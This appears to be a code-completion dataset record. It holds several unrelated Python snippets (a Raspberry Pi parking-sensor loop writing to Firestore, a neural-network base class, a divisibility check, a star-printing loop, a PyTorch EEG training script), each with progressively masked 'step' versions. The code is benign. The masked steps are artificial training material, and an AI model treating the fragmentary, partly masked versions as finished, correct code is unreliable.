GPIO.setup(s2,GPIO.IN)
#firestore initialization
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
#here starts main
data1=0
data2=0
counter=0
while 1:
if(GPIO.input(s1)==False): #car found in slot 1
data1=1
counter+=1
else: data1=0
print("Received from 1: %s" % data1)
###Now starts for sensor 2
if(GPIO.input(s2)==False): #car found in slot 2
data2=1
counter-=1
else: data2=0
print("Received from 2: %s" % data2)
if(counter>8):
counter=8
elif(counter<0):
counter=0
print("Counter= %s" % counter)
doc_ref_s1.update({
u'priority': counter
})
|
flexible
|
{
"blob_id": "e1cc4e17bffcbbae3e7785e4c55acde167a8a50a",
"index": 6482,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\n<mask token>\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-3": "<mask token>\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-4": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-5": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time \n\n############Explicit Credential environment\npath=\"/home/pi/Desktop/Parking.json\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path\n\n#GPIO starts\ns1=2\ns2=21\nGPIO.setmode(GPIO.BCM) \nGPIO.setwarnings(False)\nGPIO.setup(s1,GPIO.IN)\nGPIO.setup(s2,GPIO.IN)\n\n\n#firestore initialization\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\t\t\t\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\n#here starts main\ndata1=0\ndata2=0\ncounter=0\nwhile 1:\n\t\n\tif(GPIO.input(s1)==False): #car found in slot 1\n\t\tdata1=1\n\t\tcounter+=1\n\telse: data1=0\n \n\tprint(\"Received from 1: %s\" % data1)\n\t###Now starts for sensor 2\t\n\tif(GPIO.input(s2)==False): #car found in slot 2\n\t\tdata2=1\n\t\tcounter-=1\n\telse: data2=0\n\tprint(\"Received from 2: %s\" % data2)\n\tif(counter>8):\n\t\tcounter=8\n\telif(counter<0):\n\t\tcounter=0\n\tprint(\"Counter= %s\" % counter)\n\tdoc_ref_s1.update({\n\t\tu'priority': counter\n\t\t})\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import hlp
import pdb
class Nnt(list):
"""
Generic layer of neural network
"""
def __init__(self):
"""
Initialize the neural network base object.
"""
self.tag = None
def y(self, x):
"""
build sybolic expression of output {y} given input {x}
this also the defaut expression returned when the Net object is
called as a function
"""
return x
def __call__(self, x):
"""
build symbolic expression of output given input. This makes the
object callable.
"""
return self.y(x)
def p(self):
"""
return independent parameters - the shared tensor variables in
output {y}'s expression.
"""
return hlp.parms(self.y(0))
def __repr__(self):
return '{}{}'.format(
"" if self.tag is None else self.tag,
super(Nnt, self).__repr__())
|
normal
|
{
"blob_id": "fb53ea6a7184c0b06fb8a4cbfaf2145cc5c2e8e2",
"index": 9468,
"step-1": "<mask token>\n\n\nclass Nnt(list):\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n <mask token>\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-2": "<mask token>\n\n\nclass Nnt(list):\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n\n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-3": "<mask token>\n\n\nclass Nnt(list):\n \"\"\"\n Generic layer of neural network\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n\n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-4": "import hlp\nimport pdb\n\n\nclass Nnt(list):\n \"\"\"\n Generic layer of neural network\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n\n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format('' if self.tag is None else self.tag, super(\n Nnt, self).__repr__())\n",
"step-5": "import hlp\nimport pdb\n\nclass Nnt(list):\n \"\"\"\n Generic layer of neural network\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize the neural network base object.\n \"\"\"\n self.tag = None\n\n def y(self, x):\n \"\"\"\n build sybolic expression of output {y} given input {x}\n this also the defaut expression returned when the Net object is\n called as a function\n \"\"\"\n return x\n\n def __call__(self, x):\n \"\"\"\n build symbolic expression of output given input. This makes the\n object callable.\n \"\"\"\n return self.y(x)\n \n def p(self):\n \"\"\"\n return independent parameters - the shared tensor variables in\n output {y}'s expression.\n \"\"\"\n return hlp.parms(self.y(0))\n\n def __repr__(self):\n return '{}{}'.format(\n \"\" if self.tag is None else self.tag,\n super(Nnt, self).__repr__())\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in k:
if n % i == 0:
f = 1
print('YES')
break
if f == 0:
print('NO')
<|reserved_special_token_1|>
n = int(input())
k = [4, 7, 47, 74, 44, 77, 444, 447, 474, 477, 777, 774, 747, 7444]
f = 0
for i in k:
if n % i == 0:
f = 1
print('YES')
break
if f == 0:
print('NO')
<|reserved_special_token_1|>
n=int(input())
k=[4,7,47,74,44,77,444,447,474,477,777,774,747,7444]
f=0
for i in k:
if(n%i==0):
f=1
print("YES")
break;
if(f==0):
print("NO")
|
flexible
|
{
"blob_id": "6161653fb789040d084e475e0ae25921e2e0676b",
"index": 2496,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in k:\n if n % i == 0:\n f = 1\n print('YES')\n break\nif f == 0:\n print('NO')\n",
"step-3": "n = int(input())\nk = [4, 7, 47, 74, 44, 77, 444, 447, 474, 477, 777, 774, 747, 7444]\nf = 0\nfor i in k:\n if n % i == 0:\n f = 1\n print('YES')\n break\nif f == 0:\n print('NO')\n",
"step-4": "n=int(input())\nk=[4,7,47,74,44,77,444,447,474,477,777,774,747,7444]\nf=0\nfor i in k:\n if(n%i==0):\n f=1\n print(\"YES\")\n break;\nif(f==0):\n print(\"NO\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
for x in range(0, 10, 3):
print('★', end=' ')
print()
print('------------------------')
for y in range(0, 10):
for x in range(0, 10):
print('★', end=' ')
print()
<|reserved_special_token_1|>
# 3번 반복하고 싶은 경우
# 별 10개를 한줄로
for x in range(0, 10, 3): # 3번째 숫자는 증감할 양을 정해줌.
# print(x)
print("★", end=" ")
print()
print("------------------------")
#이중 for문
for y in range(0, 10):
for x in range(0, 10):
# print(x)
print("★", end=" ")
print()
|
flexible
|
{
"blob_id": "b360ba7412bd10e2818511cee81302d407f88fd1",
"index": 1895,
"step-1": "<mask token>\n",
"step-2": "for x in range(0, 10, 3):\n print('★', end=' ')\nprint()\nprint('------------------------')\nfor y in range(0, 10):\n for x in range(0, 10):\n print('★', end=' ')\n print()\n",
"step-3": "# 3번 반복하고 싶은 경우\r\n\r\n# 별 10개를 한줄로\r\nfor x in range(0, 10, 3): # 3번째 숫자는 증감할 양을 정해줌.\r\n # print(x)\r\n print(\"★\", end=\" \")\r\nprint()\r\nprint(\"------------------------\")\r\n#이중 for문\r\nfor y in range(0, 10):\r\n for x in range(0, 10):\r\n # print(x)\r\n print(\"★\", end=\" \")\r\n print()",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from utils import *
import copy
import torch.nn as nn
CUDA = torch.cuda.is_available()
def train_one_epoch(data_loader, net, loss_fn, optimizer):
net.train()
tl = Averager()
pred_train = []
act_train = []
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
tl.add(loss)
pred_train.extend(pred.data.tolist())
act_train.extend(y_batch.data.tolist())
optimizer.zero_grad()
loss.backward()
optimizer.step()
return tl.item(), pred_train, act_train
def predict(data_loader, net, loss_fn):
net.eval()
pred_val = []
act_val = []
vl = Averager()
with torch.no_grad():
for i, (x_batch, y_batch) in enumerate(data_loader):
if CUDA:
x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
out = net(x_batch)
loss = loss_fn(out, y_batch)
_, pred = torch.max(out, 1)
vl.add(loss.item())
pred_val.extend(pred.data.tolist())
act_val.extend(y_batch.data.tolist())
return vl.item(), pred_val, act_val
def set_up(args):
set_gpu(args.gpu)
ensure_path(args.save_path)
torch.manual_seed(args.random_seed)
torch.backends.cudnn.deterministic = True
def train(args, data_train, label_train, data_val, label_val, subject, fold):
seed_all(args.random_seed)
save_name = '_sub' + str(subject) + '_trial' + str(fold)
set_up(args)
train_loader = get_dataloader(data_train, label_train, args.batch_size)
val_loader = get_dataloader(data_val, label_val, args.batch_size)
model = get_model(args)
para = get_trainable_parameter_num(model)
print('Model {} size:{}'.format(args.model, para))
if CUDA:
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
loss_fn = nn.CrossEntropyLoss()
def save_model(name):
previous_model = osp.join(args.save_path, '{}.pth'.format(name))
if os.path.exists(previous_model):
os.remove(previous_model)
torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))
trlog = {}
trlog['args'] = vars(args)
trlog['train_loss'] = []
trlog['val_loss'] = []
trlog['train_acc'] = []
trlog['val_acc'] = []
trlog['max_acc'] = 0.0
timer = Timer()
for epoch in range(1, args.max_epoch + 1):
loss_train, pred_train, act_train = train_one_epoch(
data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)
acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)
print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'
.format(epoch, loss_train, acc_train, f1_train))
loss_val, pred_val, act_val = predict(
data_loader=val_loader, net=model, loss_fn=loss_fn
)
acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)
print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.
format(epoch, loss_val, acc_val, f1_val))
if acc_val > trlog['max_acc']:
trlog['max_acc'] = acc_val
save_model('max-acc')
if args.save_model:
# save model here for reproduce
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
torch.save(model.state_dict(), model_name_reproduce)
trlog['train_loss'].append(loss_train)
trlog['train_acc'].append(acc_train)
trlog['val_loss'].append(loss_val)
trlog['val_acc'].append(acc_val)
print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),
subject, fold))
save_name_ = 'trlog' + save_name
ensure_path(osp.join(args.save_path, 'log_train'))
torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))
return trlog['max_acc']
def test(args, data, label, reproduce, subject, fold):
seed_all(args.random_seed)
set_up(args)
test_loader = get_dataloader(data, label, args.batch_size, False)
model = get_model(args)
if CUDA:
model = model.cuda()
loss_fn = nn.CrossEntropyLoss()
if reproduce:
model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
save_path = osp.join(args.save_path, data_type)
ensure_path(save_path)
model_name_reproduce = osp.join(save_path, model_name_reproduce)
model.load_state_dict(torch.load(model_name_reproduce))
else:
model.load_state_dict(torch.load(args.load_path))
loss, pred, act = predict(
data_loader=test_loader, net=model, loss_fn=loss_fn
)
acc, f1, cm = get_metrics(y_pred=pred, y_true=act)
print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))
return acc, pred, act
|
normal
|
{
"blob_id": "6ef78e4308f6e693f50df714a5d7af1785e49d7a",
"index": 7682,
"step-1": "<mask token>\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\n<mask token>\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-2": "<mask token>\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n 
loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, 
net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-3": "<mask token>\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), 
osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if 
CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-4": "from utils import *\nimport copy\nimport torch.nn as nn\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n 
os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return 